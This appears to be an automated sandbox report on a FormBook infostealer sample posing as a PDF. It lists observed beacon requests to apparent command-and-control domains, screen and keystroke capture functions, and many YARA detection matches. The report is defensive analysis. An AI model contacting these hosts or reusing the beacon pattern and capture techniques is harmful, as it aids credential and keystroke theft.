Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.sa-pontianak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=AMbF+Q/e/AO7yIAHRf5aUfsWvc/33vy+f/8PmVMiF5qZYbHgDNTXzprpLW2ZF4YvRkgO&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.localproperty.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.tourbox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49757 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00428690 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,LdrInitializeThunk,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 6_2_00428690
Creates a DirectInput object (often for capturing keystrokes)
Source: DOC209272621615.PDF.exe, 00000000.00000002.331292006.000000000073A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0043F5F4 GetMessagePos,GetKeyboardState, 6_2_0043F5F4

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DOC209272621615.PDF.exe
Uses 32bit PE files
Source: DOC209272621615.PDF.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Yara signature match
Source: DOC209272621615.PDF.exe, type: SAMPLE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
